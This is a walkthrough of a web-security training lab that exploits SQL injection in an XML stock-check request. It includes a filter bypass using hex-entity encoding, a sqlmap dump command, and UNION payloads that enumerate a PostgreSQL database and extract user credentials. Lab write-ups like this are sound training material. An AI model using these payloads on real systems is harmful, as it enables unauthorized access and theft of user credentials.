Task
This lab contains a SQL injection vulnerability in its stock check feature. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables.
The database contains a users table, which contains the usernames and passwords of registered users. To solve the lab, perform a SQL injection attack to retrieve the admin user’s credentials, then log in to their account.
Attempt
Though the task description says the stock check feature has a vulnerability. Let’s capture a request
POST /product/stock HTTP/2
Host: 0a1d00a80403a8b180edd00c00ff009b.web-security-academy.net
Cookie: session=dOia7Ldy3X2aGpOGkefzg37Uqmwp4z6g
Content-Length: 107
Sec-Ch-Ua-Platform: "Linux"
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Content-Type: application/xml
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Origin: https://0a1d00a80403a8b180edd00c00ff009b.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a1d00a80403a8b180edd00c00ff009b.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>2</storeId></stockCheck>
It sends a post request with xml data
First things’s first I changed the productId to ' and sent the request, but got a message attack detected. So I need to bypass this too.
To test what payload would work, I used sqlmap:
sqlmap -u "https://0a1d00a80403a8b180edd00c00ff009b.web-security-academy.net/product/stock" --data '<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1*</productId><storeId>2</storeId></stockCheck>' --headers="Content-Type: application/xml" --batch --dump --level 2 --risk 2
Since it would take some time I tried a different approach using Hackvertor extension. Opened Repeater, selected ' I used, right clicked it and selected Extension > Hackverter > encode > hex entities. Now it’s passed!
Now I need to craft a good sqli payload to extract usernames and passwords. First payload:
1 ORDER BY 1-- -
This returned the correct unit number 349 but with order by 2 it became 0. So the number of columns must be 1.
From the task description I already know there’s a table called users but let’s enumerate.
I used this to list databases:
1 UNION select schema_name from INFORMATION_SCHEMA.SCHEMATA-- -
(btw database() didn’t work. I guess it’s postgre not mysql)
It returned these:
public
pg_catalog
information_schema
Let’s list tables:
1 UNION SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='public'-- -
output:
users
stock_level
products
This confirmed there’s indeed users table.
Enumerate columns:
1 UNION select COLUMN_NAME || ':' || TABLE_NAME from INFORMATION_SCHEMA.COLUMNS where table_name='users'-- -
Result:
email:users
password:users
username:users
Now let’s get the admin’s password and username!:
1 UNION select username || ':' || password from users-- -
Result:
carlos:ixtx9c1ypl3lfnrx39df
wiener:408ub0blik2p9w5etn2h
administrator:fakfsnh1o7wci2f8xmd1
With these credentials I was able to successfully log in as the admin.